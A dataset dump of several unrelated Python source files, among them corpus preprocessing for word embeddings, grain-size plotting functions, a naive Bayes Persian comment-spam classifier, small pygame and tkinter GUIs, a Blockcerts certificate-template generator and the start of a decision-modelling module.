print(f'Final vocabulary size = {len(final_freq):,}', file=preview)
print(f'Subsampled number of words = '
f'{sum(freq for freq in final_freq.values()):,}', file=preview)
# Filter out empty documents
corpus = [doc for doc in corpus if len(doc.sentences) > 0]
# Numericalize corpus by word_ids
word_to_id, id_to_word = build_vocabulary(final_freq)
for doc in tqdm(corpus, desc='Converting to word ids'):
for sent in doc.sentences:
sent.numerical_tokens = [
word_to_id[token] for token in sent.subsampled_tokens]
if conserve_RAM:
sent.subsampled_tokens = None
# Prepare grounding for intrinsic evaluation
random_eval_words = set()
for gw in ground.values():
gw.majority_cono = gw.cono.most_common(1)[0][0]
gw.freq = sum(gw.cono.values())
gw.R_ratio = gw.cono['R'] / gw.freq
if gw.freq >= eval_min_freq:
random_eval_words.add(gw.text)
random_eval_words = random.sample(random_eval_words, eval_num_random_samples)
with open(out_dir / f'eval_words_random.txt', 'w') as file:
file.write('\n'.join(random_eval_words))
for R_threshold in eval_R_thresholds:
D_threshold = 1 - R_threshold
partisan_eval_words = []
for gw in ground.values():
if gw.freq >= eval_min_freq:
if gw.R_ratio >= R_threshold or gw.R_ratio <= D_threshold:
partisan_eval_words.append(gw)
print(f'{len(partisan_eval_words)} partisan eval words '
f'with R_threshold = {R_threshold}', file=preview)
out_path = out_dir / f'inspect_{R_threshold}_partisan.tsv'
with open(out_path, 'w') as file:
print('word\tfreq\tR_ratio', file=file)
for gw in partisan_eval_words:
print(gw.text, gw.freq, gw.R_ratio, sep='\t', file=file)
if len(partisan_eval_words) > 2 * eval_num_random_samples:
partisan_eval_words = random.sample(
partisan_eval_words, 2 * eval_num_random_samples)
else:
random.shuffle(partisan_eval_words)
mid = len(partisan_eval_words) // 2
with open(out_dir / f'{R_threshold}partisan_dev_words.txt', 'w') as file:
for gw in partisan_eval_words[:mid]:
print(gw.text, file=file)
with open(out_dir / f'{R_threshold}partisan_test_words.txt', 'w') as file:
for gw in partisan_eval_words[mid:]:
print(gw.text, file=file)
# Helper for negative sampling
cumulative_freq = sum(freq ** 0.75 for freq in final_freq.values())
negative_sampling_probs: Dict[int, float] = {
word_to_id[word]: (freq ** 0.75) / cumulative_freq
for word, freq in final_freq.items()}
vocab_size = len(word_to_id)
negative_sampling_probs: List[float] = [
# negative_sampling_probs[word_id] # strict
negative_sampling_probs.get(word_id, 0) # prob = 0 if missing vocab
for word_id in range(vocab_size)]
random.shuffle(corpus)
cucumbers = {
'word_to_id': word_to_id,
'id_to_word': id_to_word,
'ground': ground,
'negative_sampling_probs': negative_sampling_probs,
'documents': corpus}
print(f'Writing to {out_dir}')
with open(out_dir / 'train.pickle', 'wb') as out_file:
pickle.dump(cucumbers, out_file, protocol=-1)
# Print out vocabulary & some random sentences for sanity check
docs = random.sample(corpus, 100)
preview.write('\n')
for doc in docs:
sent = doc.sentences[0]
if not conserve_RAM:
# print(sent.tokens, file=preview)
# print(sent.normalized_tokens, file=preview)
print(sent.subsampled_tokens, file=preview)
print(sent.numerical_tokens, file=preview, end='\n\n')
else:
print(sent.numerical_tokens, file=preview)
# print(vars(doc), end='\n\n', file=preview)
preview.write('\n\nfinal_freq\tword\n')
for key, val in final_freq.most_common():
print(f'{val:,}\t{ground[key]}', file=preview)
preview.close()
print('All set!')
# preview_path = out_dir / 'preview.txt'
# with open(preview_path, 'w') as preview:
# preview.write(f'final vocabulary size = {len(word_to_id):,}\n')
# # preview.write(f'total number of words = {num_words_exported:,}\n')
# preview.write(f'subsampling implementation = {subsampling_implementation}\n')
# preview.write(f'subsampling threshold = {subsampling_threshold}\n')
# preview.write(f'minimum word frequency = {min_word_freq}\n')
# preview.write(f'\nPreview:\n')
# for speech in export_docs[:100]:
# words = map(id_to_word.get, speech[1]) # type: ignore
# preview.write(' '.join(words) + '\n')
# export_sorted_frequency(
# raw_frequency, combined_frequency, min_word_freq,
# out_dir / 'vocabulary_subsampled_frequency.txt')
# export_sampled_frequency_by_party(
# D_raw_freq, R_raw_freq, D_final_freq, R_final_freq, word_to_id,
# out_dir / 'vocabulary_partisan_frequency')
# random.shuffle(export_docs)
# corpus = [doc for _, doc in export_docs]
# labels = [label for label, _ in export_docs]
# grounding: Dict[str, Dict] = {}
# for word in word_to_id.keys():
# df = D_raw_freq[word]
# rf = R_raw_freq[word]
# grounding[word] = {
# 'D': df,
# 'R': rf,
# 'R_ratio': rf / (df + rf)}
# cucumbers = {
# 'word_to_id': word_to_id,
# 'id_to_word': id_to_word,
# 'grounding': grounding,
# 'negative_sampling_probs': negative_sampling_probs,
# 'documents': documents,
# 'cono_labels': labels}
# train_data_path = out_dir / f'train_data.pickle'
# with open(train_data_path, 'wb') as export_file:
# pickle.dump(cucumbers, export_file, protocol=-1)
# print('All set.')
if __name__ == '__main__':
main(
sessions=range(97, 112),
in_dir=Path('../../data/interim/underscored_corpora'),
out_dir=Path(f'../../data/ready/CR_proxy'),
subsampling_implementation='paper',
subsampling_threshold=1e-5,
min_word_freq=15,
min_sent_len=5,
fixed_sent_len=20,
eval_min_freq=100,
eval_R_thresholds=(0.6, 0.7, 0.75, 0.8, 0.9),
eval_num_random_samples=500,
conserve_RAM=True
)
| StarcoderdataPython |
3366507 | <reponame>jwestraadt/GrainSizeTools
# ============================================================================ #
# #
# This is part of the "GrainSizeTools Script" #
# A Python script for characterizing grain size from thin sections #
# #
# Copyright (c) 2014-present <NAME> #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
# Version 3.0.2 #
# For details see: http://marcoalopez.github.io/GrainSizeTools/ #
# download at https://github.com/marcoalopez/GrainSizeTools/releases #
# #
# ============================================================================ #
# ============================================================================ #
# Functions to generate the plots using the Python matplotlib library. #
# It uses hex color codes to set colors. #
# Save this file in the same directory as GrainSizeTools #
# ============================================================================ #
# import Python scientific modules
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import norm, gaussian_kde, shapiro, iqr
# plotting funtions
def distribution(data,
plot=('hist', 'kde'),
avg=('amean', 'gmean', 'median', 'mode'),
binsize='auto',
bandwidth='silverman',
**fig_kw):
""" Return a plot with the ditribution of (apparent or actual) grain sizes
in a dataset.
Parameters
----------
data : array_like
the size of the grains
plot : string, tuple or list; optional
the type of plot, either histogram ('hist'), kernel density estimate
('kde') or both ('hist', 'kde'). Default is both.
avg : string, tuple or list; optional
the central tendency measures o show, either the arithmetic ('amean')
or geometric ('gmean') means, the median ('median'), and/or the
KDE-based mode ('mode'). Default all averages.
binsize : string or positive scalar; optional
If 'auto', it defines the plug-in method to calculate the bin size.
When integer or float, it directly specifies the bin size.
Default: the 'auto' method.
| Available plug-in methods:
| 'auto' (fd if sample_size > 1000 or Sturges otherwise)
| 'doane' (Doane's rule)
| 'fd' (Freedman-Diaconis rule)
| 'rice' (Rice's rule)
| 'scott' (Scott rule)
| 'sqrt' (square-root rule)
| 'sturges' (Sturge's rule)
bandwidth : string {'silverman' or 'scott'} or positive scalar; optional
the method to estimate the bandwidth or a scalar directly defining the
bandwidth. It uses the Silverman plug-in method by default.
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
Call functions
--------------
- gaussian_kde (from Scipy stats)
Examples
--------
>>> distribution(data['diameters'])
>>> distribution(data['diameters'], figsize=(6.4, 4.8))
Returns
-------
A plot showing the distribution of (apparent) grain sizes and
the location of the averages defined.
"""
fig, ax = plt.subplots(**fig_kw)
if 'hist' in plot:
if isinstance(binsize, (int, float)):
binsize = int(np.ceil((data.max() - data.min()) / binsize))
y_values, bins, __ = ax.hist(data,
bins=binsize,
range=(data.min(), data.max()),
density=True,
color='#80419d',
edgecolor='#C59fd7',
alpha=0.7)
print('=======================================')
print('Number of classes = ', len(bins) - 1)
print('binsize = ', round(bins[1] - bins[0], 2))
print('=======================================')
if 'kde' in plot:
# estimate kde first
if isinstance(bandwidth, (int, float)):
fixed_bw = bandwidth / np.std(data, ddof=1)
kde = gaussian_kde(data, bw_method=fixed_bw)
elif isinstance(bandwidth, str):
kde = gaussian_kde(data, bw_method=bandwidth)
bandwidth = round(kde.covariance_factor() * data.std(ddof=1), 2)
else:
raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")
x_values = np.linspace(data.min(), data.max(), num=1000)
y_values = kde(x_values)
print('=======================================')
print('KDE bandwidth = ', round(bandwidth, 2))
print('=======================================')
if 'hist' in plot:
ax.plot(x_values, y_values,
color='#2F4858')
else:
ax.plot(x_values, y_values,
color='#2F4858')
ax.fill_between(x_values, y_values,
color='#80419d',
alpha=0.65)
# plot the location of the averages
if 'amean' in avg:
amean = np.mean(data)
ax.vlines(amean, 0, np.max(y_values),
linestyle='solid',
color='#2F4858',
label='arith. mean',
linewidth=2.5)
if 'gmean' in avg:
gmean = np.exp(np.mean(np.log(data)))
ax.vlines(gmean, 0, np.max(y_values),
linestyle='solid',
color='#fec44f',
label='geo. mean')
if 'median' in avg:
median = np.median(data)
ax.vlines(median, 0, np.max(y_values),
linestyle='dashed',
color='#2F4858',
label='median',
linewidth=2.5)
if 'mode' in avg and 'kde' in plot:
mode = x_values[np.argmax(y_values)]
ax.vlines(mode, 0, np.max(y_values),
linestyle='dotted',
color='#2F4858',
label='mode',
linewidth=2.5)
ax.set_ylabel('density', color='#252525')
ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
ax.legend(loc='best', fontsize=16)
# ax.set_ylim(bottom=-0.001)
fig.tight_layout()
return fig, ax
def area_weighted(diameters, areas, binsize='auto', **fig_kw):
""" Generate an area-weighted histogram and returns different
area-weighted statistics.
Parameters
----------
diameters : array_like
the size of the grains
areas : array_like
the sectional areas of the grains
binsize : string or positive scalar, optional
If 'auto', it defines the plug-in method to calculate the bin size.
When integer or float, it directly specifies the bin size.
Default: the 'auto' method.
| Available plug-in methods:
| 'auto' (fd if sample_size > 1000 or Sturges otherwise)
| 'doane' (Doane's rule)
| 'fd' (Freedman-Diaconis rule)
| 'rice' (Rice's rule)
| 'scott' (Scott rule)
| 'sqrt' (square-root rule)
| 'sturges' (Sturge's rule)
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
Examples
--------
>>> area_weighted(data['diameters'], data['Areas'])
>>> area_weighted(data['diameters'], data['Areas'], binsize='doane', dpi=300)
"""
# estimate weighted mean
area_total = np.sum(areas)
weighted_areas = areas / area_total
weighted_mean = np.sum(diameters * weighted_areas)
# estimate mode interval
if type(binsize) is str:
histogram, bin_edges = np.histogram(diameters, bins=binsize, range=(0.0, diameters.max()))
h = bin_edges[1]
else:
bin_edges = np.arange(0.0, diameters.max() + binsize, binsize)
h = binsize
# estimate the cumulative areas of each grain size interval
cumulativeAreas = np.zeros(len(bin_edges))
for index, values in enumerate(bin_edges):
mask = np.logical_and(diameters >= values, diameters < (values + h))
area_sum = np.sum(areas[mask])
cumulativeAreas[index] = round(area_sum, 1)
# get the index of the modal interval
getIndex = np.argmax(cumulativeAreas)
print('=======================================')
print('DESCRIPTIVE STATISTICS')
print(f'Area-weighted mean grain size = {weighted_mean:0.2f} microns')
print('=======================================')
print('HISTOGRAM FEATURES')
print(f'The modal interval is {bin_edges[getIndex]:0.2f} - {bin_edges[getIndex] + h:0.2f} microns')
if type(binsize) is str:
print(f'The number of classes are {len(histogram)}')
print(f'The bin size is {h:0.2f} according to the {binsize} rule')
print('=======================================')
# normalize the y-axis values to percentage of the total area
totalArea = sum(cumulativeAreas)
cumulativeAreasNorm = [(x / float(totalArea)) * 100 for x in cumulativeAreas]
maxValue = max(cumulativeAreasNorm)
#make plot
fig, ax = plt.subplots(**fig_kw)
# figure aesthetics
ax.bar(bin_edges, cumulativeAreasNorm, width=h,
color='#55A868',
edgecolor='#FEFFFF',
align='edge',
alpha=1)
ax.vlines(weighted_mean, ymin=0, ymax=maxValue,
linestyle='--',
color='#1F1F1F',
label='area weighted mean',
linewidth=2)
ax.set_ylabel('normalized area fraction (%)', color='#252525')
ax.set_xlabel(r'apparent diameter ($\mu m$)', color='#252525')
ax.legend(loc='best', fontsize=15)
fig.tight_layout()
return fig, ax
def normalized(data, avg='amean', bandwidth='silverman', **fig_kw):
"""Return a log-transformed normalized ditribution of the grain
population. This is useful to compare grain size distributions
beween samples with different average values.
Parameters
----------
data : array-like
the dataset
avg : str, optional
the normalization factor, either 'amean' or 'median'.
Default: 'amean'
bandwidth : str or scalar, optional
the bandwidth of the KDE, by default 'silverman'
**fig_kw :
additional keyword arguments to control the size (figsize) and
resolution (dpi) of the plot. Default figsize is (6.4, 4.8).
Default resolution is 100 dpi.
"""
data = np.log(data)
amean = np.mean(data)
median = np.median(data)
# normalize the data
if avg == 'amean':
norm_factor = amean
norm_data = data / norm_factor
elif avg == 'median':
norm_factor = median
norm_data = data / median
else:
raise ValueError("Normalization factor has to be defined as 'amean' or 'median'")
# estimate KDE
if isinstance(bandwidth, (int, float)):
fixed_bw = bandwidth / np.std(norm_data, ddof=1)
kde = gaussian_kde(norm_data, bw_method=fixed_bw)
elif isinstance(bandwidth, str):
kde = gaussian_kde(norm_data, bw_method=bandwidth)
bandwidth = round(kde.covariance_factor() * norm_data.std(ddof=1), 2)
else:
raise ValueError("bandwidth must be integer, float, or plug-in methods 'silverman' or 'scott'")
x_values = np.linspace(norm_data.min(), norm_data.max(), num=1000)
y_values = kde(x_values)
# Provide details
print('=======================================')
if avg == 'amean':
print(f'Normalized SD = {np.std(norm_data):0.3f}')
if avg == 'median':
print(f'Normalized IQR = {iqr(norm_data):0.3f}')
print('KDE bandwidth = ', round(bandwidth, 2))
print('=======================================')
#make plot
fig, ax = plt.subplots(**fig_kw)
ax.plot(x_values, y_values,
color='#2F4858')
ax.fill_between(x_values, y_values,
color='#d1346b',
alpha=0.5)
ax.vlines(amean / norm_factor, 0, np.max(y_values),
linestyle='solid',
color='#2F4858',
label='arith. mean',
linewidth=2.5)
ax.vlines(median / norm_factor, 0, np.max(y_values),
linestyle='dashed',
color='#2F4858',
label='median',
linewidth=2.5)
ax.set_ylabel('density', color='#252525')
if avg == 'amean':
ax.set_xlabel(r'normalized log grain size ($y / \bar{y}$)', color='#252525')
else:
ax.set_xlabel(r'normalized log grain size ($y / med_{y}$)', color='#252525')
ax.legend(loc='best', fontsize=15)
fig.tight_layout()
return fig, ax
def qq_plot(data, percent=2, **fig_kw):
""" Test whether the underlying distribution follows a lognormal
distribution using a quantile–quantile (q-q) plot and a Shapiro-
Wilk test.
Parameters
----------
data : array-like
the apparent diameters or any other type of data
percent : scalar between 0 and 100
the percentil interval to estimate, default is 2 %
Call functions
--------------
shapiro from scipy's stats
"""
data = np.sort(np.log(data))
# estimate percentiles in the actual data
percentil = np.arange(1, 100, percent)
actual_data = np.percentile(data, percentil)
# estimate percentiles for theoretical data
mean, std = np.mean(data), np.std(data)
theoretical_data = norm.ppf(percentil / 100, loc=mean, scale=std)
min_val, max_val = theoretical_data.min(), theoretical_data.max()
# make the plot
fig, ax = plt.subplots(**fig_kw)
ax.plot([min_val, max_val], [min_val, max_val],
'-',
color='#2F4858',
label='perfect lognormal')
ax.plot(theoretical_data, actual_data,
'o',
color='C0',
alpha=0.5)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.set_xlabel('theoretical', color='#252525')
ax.set_ylabel('observed', color='#252525')
ax.legend(loc='best', fontsize=18)
# ax.set_aspect('equal')
fig.tight_layout()
# Shapiro-Wilk test
if len(data) > 250:
W, p_value = shapiro(np.random.choice(data, size=250))
else:
W, p_value = shapiro(data)
print('=======================================')
print('Shapiro-Wilk test (lognormal):')
print(f'{W:0.2f}, {p_value:0.2f} (test statistic, p-value)')
if p_value >= 0.05:
print('It looks like a lognormal distribution')
print('(⌐■_■)')
else:
print('It doesnt look like a lognormal distribution (p-value < 0.05)')
print('(╯°□°)╯︵ ┻━┻')
print('=======================================')
return fig, ax
if __name__ == '__main__':
pass
else:
print('module plot imported')
| StarcoderdataPython |
61598 | <filename>DigikalaCommentVerification/prepare.py
import pandas
import re
USELESS_WORDS = ['از', 'با', 'که', 'تا', 'در', 'اگر', 'اگه', 'یه', 'به', 'دیجی', 'دیجیکالا', 'خیلی', 'خریدم', 'عالی']
NUM_OF_TRAIN_COMMENTS = 180000
NUM_OF_TEST_COMMENTS = 18000
train_comments = pandas.read_csv('Files/train.csv', index_col='id')
# concat title and comment into new column
train_comments['full_comment'] = train_comments['title'] + ' ' + train_comments['comment']
train_comments['full_comment'] = train_comments['full_comment'].astype(str)
train_comments = train_comments.drop(columns=['rate'])
test_comments = pandas.read_csv('Files/test.csv', index_col='id')
# concat title and comment into new column
test_comments['full_comment'] = test_comments['title'] + ' ' + test_comments['comment']
test_comments['full_comment'] = test_comments['full_comment'].astype(str)
test_comments = test_comments.drop(columns=['rate'])
test_comments['verification_status'] = 0
spam_comments = train_comments[train_comments.verification_status == 1]
ham_comments = train_comments[train_comments.verification_status == 0]
num_of_spam_train = len(spam_comments)
num_of_ham_train = len(ham_comments)
# probability if a comment is ham
probability_of_being_ham = num_of_ham_train / len(train_comments)
# probability if a comment is spam
probability_of_being_spam = num_of_spam_train / len(train_comments)
word_dictionary = dict()
ham_word_dictionary = dict()
spam_word_dictionary = dict()
# not unique words in spam comments
num_of_words_in_spam_comments = 0
# not unique words in ham comments
num_of_words_in_ham_comments = 0
for index, row in train_comments.iterrows():
print(index)
row['full_comment'] = re.sub(r'[.|?,،!؟]', ' ', row['full_comment'])
full_comment = row['full_comment'].split()
for word in full_comment:
# Take out emails, urls and numbers from words
if re.match(r'^[-+]?[0-9]+$', word) or re.match(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', word) or re.match(
r'(?:[a-z0-9!#$%&\'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&\'*+/=?^_`{'
r'|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\['
r'\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*['
r'a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4]['
r'0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]['
r'0-9]?|[a-z0-9-]*[a-z0-9]:(?:['
r'\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\['
r'\x01-\x09\x0b\x0c\x0e-\x7f])+)\])', word) or re.match(r'[.!?\\-]', word) or (word in USELESS_WORDS):
continue
# number of occurrences of each word in ham comments
else:
if row.verification_status == 0:
ham_word_dictionary[word] = ham_word_dictionary.get(word, 0) + 1
num_of_words_in_ham_comments += 1
else:
spam_word_dictionary[word] = spam_word_dictionary.get(word, 0) + 1
num_of_words_in_spam_comments += 1
word_dictionary[word] = word_dictionary.get(word, 0) + 1
# unique words or V
num_of_unique_words_in_train_comments = len(word_dictionary.keys())
for index, row in test_comments.iterrows():
print(index)
row['full_comment'] = re.sub(r'[.|?,،!؟]', ' ', row['full_comment'])
full_comment = row['full_comment'].split()
ham_probability = probability_of_being_ham
spam_probability = probability_of_being_spam
for word in full_comment:
# Take out emails, urls and numbers from words
if re.match(r'^[-+]?[0-9]+$', word) or re.match(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', word) or re.match(
r'(?:[a-z0-9!#$%&\'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&\'*+/=?^_`{'
r'|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\['
r'\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*['
r'a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4]['
r'0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]['
r'0-9]?|[a-z0-9-]*[a-z0-9]:(?:['
r'\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\['
r'\x01-\x09\x0b\x0c\x0e-\x7f])+)\])', word) or re.match(r'[.!?\\-]', word) or (word in USELESS_WORDS):
continue
# number of occurrences of each word in ham comments
else:
if word_dictionary.get(word, 0) == 0:
continue
else:
ham_probability *= ((ham_word_dictionary.get(word, 0) + 1) / (
num_of_words_in_ham_comments + num_of_unique_words_in_train_comments))
spam_probability *= ((spam_word_dictionary.get(word, 0) + 1) / (
num_of_words_in_spam_comments + num_of_unique_words_in_train_comments))
if ham_probability > spam_probability:
test_comments.loc[index, 'verification_status'] = 0
else:
test_comments.loc[index, 'verification_status'] = 1
test_comments = test_comments.drop(['title', 'comment', 'full_comment'], 1)
test_comments.to_csv(
r'/Users/parsahejabi/University/Term7/Artificial '
r'Intelligence/Homeworks/ComputerAssignments/Projects/DigikalaCommentVerification/SolutionWithoutLibrary/ans.csv')
| StarcoderdataPython |
12833092 | ##### INITIALIZATION
# Import Modules
import pygame
# Initialize PyGame
pygame.init()
# Initialize game window
screen = pygame.display.set_mode((1280, 960))
##### MAIN PROGRAM
# Loop until the window is closed
window_open = True
while window_open:
for event in pygame.event.get():
if event.type == pygame.QUIT: # Request to close window
window_open = False
# Close the window
pygame.quit() | StarcoderdataPython |
6593777 | <gh_stars>0
""" Split activity window """
import tkinter
import tkinter.ttk
from gui.labeled_combobox import LabeledCombobox
from gui.labeled_textbox import LabeledTextbox
import model.activity
import model.project
from model.project import Project
from model.activity import Activity
import config
class ActivitySplit(tkinter.Toplevel):
""" Split activity window """
_WINDOW_WIDTH = 400
_WINDOW_HEIGHT = 250
def __init__(self):
self._debut_activity = None
# Initialization
tkinter.Toplevel.__init__(self)
self.wm_geometry(str(self._WINDOW_WIDTH) + "x" + str(self._WINDOW_HEIGHT))
cell_y = 0
# Project
self._projects = Project.get_projects()
self._project_combo_val = []
self._build_project_combo_values()
self._project_combo = LabeledCombobox(self, "Project", self._project_combo_val, 0, cell_y)
cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]
# Duration
self._duration = LabeledTextbox(self, "Duration", "", 0, cell_y)
cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]
# Work
self._work = LabeledTextbox(self, "Work", "", 0, cell_y)
cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]
# Button
save_button = tkinter.Button(self, text="Save", command=self._save_click)
save_button.place(x=config.CONSTANTS["GUI_CELL_WIDTH"], y=cell_y)
cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]
def fill_with_activity(self, act: model.activity.Activity):
""" Fills window with given activity """
self._debut_activity = act
proj = self._debut_activity.project
clnt = self._debut_activity.client
self._project_combo.selected_value = clnt.name + " - " + proj.name
self._duration.value = str(0)
self._work.value = act.work
def fill_with_last_activity(self):
""" Fills window with latest activity """
last_activity = Activity.get_last_activity()
if last_activity == {}:
return
self.fill_with_activity(last_activity)
def _build_project_combo_values(self):
for prj in self._projects["projects"]:
self._project_combo_val.append(prj["client_name"] + " - " + prj["project_name"])
def _save_click(self):
project_full = self._project_combo.selected_value
client, project = project_full.split(" - ")
self._debut_activity.split(
client_name=client,
project_name=project,
hours=int(self._duration.value),
work=self._work.value
)
self.destroy()
| StarcoderdataPython |
9722228 | #!/usr/bin/env python
'''
Creates a certificate template with merge tags for recipient/assertion-specific data.
'''
import json
import os
import uuid
import configargparse
from cert_tools import helpers
from cert_tools import jsonpath_helpers
from cert_core.cert_model.model import scope_name
from cert_schema import *
OPEN_BADGES_V2_CONTEXT = OPEN_BADGES_V2_CANONICAL_CONTEXT
BLOCKCERTS_V2_CONTEXT = BLOCKCERTS_V2_CANONICAL_CONTEXT
def create_badge_section(config):
cert_image_path = os.path.join(config.abs_data_dir, config.cert_image_file)
issuer_image_path = os.path.join(config.abs_data_dir, config.issuer_logo_file)
badge = {
'type': 'BadgeClass',
'id': helpers.URN_UUID_PREFIX + config.badge_id,
'name': config.certificate_title,
'description': config.certificate_description,
'image': helpers.encode_image(cert_image_path),
'issuer': {
'id': config.issuer_id,
'type': 'Profile',
'name': config.issuer_name,
'url': config.issuer_url,
'email': config.issuer_email,
'image': helpers.encode_image(issuer_image_path),
'revocationList': config.revocation_list
}
}
badge['criteria'] = {}
badge['criteria']['narrative'] = config.criteria_narrative
if config.issuer_signature_lines:
signature_lines = []
signature_lines = []
for signature_line in config.issuer_signature_lines:
signature_image_path = os.path.join(config.abs_data_dir, signature_line['signature_image'])
signature_lines.append(
{
'type': [
'SignatureLine',
'Extension'
],
'jobTitle': signature_line['job_title'],
'image': helpers.encode_image(signature_image_path),
'name': signature_line['name']
}
)
badge[scope_name('signatureLines')] = signature_lines
return badge
def create_verification_section(config):
verification = {
'type': ['MerkleProofVerification2017', 'Extension'],
'publicKey': config.issuer_public_key
}
return verification
def create_recipient_section(config):
recipient = {
'type': 'email',
'identity': '*|EMAIL|*',
'hashed': config.hash_emails
}
return recipient
def create_recipient_profile_section():
return {
'type': ['RecipientProfile', 'Extension'],
'name': '*|NAME|*',
'publicKey': 'ecdsa-koblitz-pubkey:*|PUBKEY|*'
}
def create_assertion_section(config):
assertion = {
'@context': [
OPEN_BADGES_V2_CONTEXT,
BLOCKCERTS_V2_CONTEXT,
{
"displayHtml": { "@id": "schema:description" }
}
],
'type': 'Assertion',
'displayHtml': config.display_html,
'issuedOn': '*|DATE|*',
'id': helpers.URN_UUID_PREFIX + '*|CERTUID|*'
}
return assertion
def create_certificate_template(config):
if not config.badge_id:
badge_uuid = str(uuid.uuid4())
print('Generated badge id {0}'.format(badge_uuid))
config.badge_id = badge_uuid
badge = create_badge_section(config)
verification = create_verification_section(config)
assertion = create_assertion_section(config)
recipient = create_recipient_section(config)
recipient_profile = create_recipient_profile_section()
template_dir = config.template_dir
if not os.path.isabs(template_dir):
template_dir = os.path.join(config.abs_data_dir, template_dir)
template_file_name = config.template_file_name
assertion['recipient'] = recipient
assertion[scope_name('recipientProfile')] = recipient_profile
assertion['badge'] = badge
assertion['verification'] = verification
if config.additional_global_fields:
for field in config.additional_global_fields:
assertion = jsonpath_helpers.set_field(assertion, field['path'], field['value'])
if config.additional_per_recipient_fields:
for field in config.additional_per_recipient_fields:
assertion = jsonpath_helpers.set_field(assertion, field['path'], field['value'])
template_path = os.path.join(config.abs_data_dir, template_dir, template_file_name)
print('Writing template to ' + template_path)
with open(template_path, 'w') as cert_template:
json.dump(assertion, cert_template)
return assertion
def get_config():
cwd = os.getcwd()
config_file_path = os.path.join(cwd, 'conf.ini')
p = configargparse.getArgumentParser(default_config_files=[config_file_path])
p.add('-c', '--my-config', required=False, is_config_file=True, help='config file path')
p.add_argument('--data_dir', type=str, help='where data files are located')
p.add_argument('--issuer_logo_file', type=str, help='issuer logo image file, png format')
p.add_argument('--cert_image_file', type=str, help='issuer logo image file, png format')
p.add_argument('--issuer_url', type=str, help='issuer URL')
p.add_argument('--issuer_certs_url', type=str, help='issuer certificates URL')
p.add_argument('--issuer_email', required=True, type=str, help='issuer email')
p.add_argument('--issuer_name', required=True, type=str, help='issuer name')
p.add_argument('--issuer_id', required=True, type=str, help='issuer profile')
p.add_argument('--issuer_key', type=str, help='issuer issuing key')
p.add_argument('--certificate_description', type=str, help='the display description of the certificate')
p.add_argument('--certificate_title', required=True, type=str, help='the title of the certificate')
p.add_argument('--criteria_narrative', required=True, type=str, help='criteria narrative')
p.add_argument('--template_dir', type=str, help='the template output directory')
p.add_argument('--template_file_name', type=str, help='the template file name')
p.add_argument('--hash_emails', action='store_true',
help='whether to hash emails in the certificate')
p.add_argument('--revocation_list', type=str, help='issuer revocation list')
p.add_argument('--issuer_public_key', type=str, help='issuer public key')
p.add_argument('--badge_id', required=True, type=str, help='badge id')
p.add_argument('--issuer_signature_lines', action=helpers.make_action('issuer_signature_lines'),
help='issuer signature lines')
p.add_argument('--additional_global_fields', action=helpers.make_action('global_fields'),
help='additional global fields')
p.add_argument('--additional_per_recipient_fields', action=helpers.make_action('per_recipient_fields'),
help='additional per-recipient fields')
p.add_argument('--display_html', type=str, help='html content to display')
args, _ = p.parse_known_args()
args.abs_data_dir = os.path.abspath(os.path.join(cwd, args.data_dir))
return args
def main():
conf = get_config()
template = create_certificate_template(conf)
print('Created template!')
if __name__ == "__main__":
main()
| StarcoderdataPython |
3260620 | <filename>decision.py
"""
decision.py
Code for representing decisions including predicting decisions based on a
player model and assessing goals based on decision information.
"""
import random
import utils
from packable import pack, unpack
from diffable import diff
import perception
import choice
from base_types import Certainty, Valence, Salience
class DecisionMethod:
"""
Decision modes reflect general strategies for making decisions based on
modes of engagement and prospective impressions.
"""
def __new__(cls, name_or_other="abstract"):
result = object.__new__(cls)
if isinstance(name_or_other, DecisionMethod):
result.name = name_or_other.name
else:
result.name = name_or_other
return result
def _diff_(self, other):
"""
Reports differences (see diffable.py).
"""
differences = []
if not isinstance(other, type(self)):
differences.append(
"exact types: {} != {}".format(type(self), type(other))
)
if self.name != other.name:
differences.append("names: '{}' != '{}'".format(self.name, other.name))
return differences
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
if other.name != self.name:
return False
return True
def __hash__(self):
return hash(type(self)) + 7 * hash(self.name)
def _pack_(self):
"""
Turns this object into a simple object that can be converted to JSON.
Example:
```
DecisionMethod.maximizing
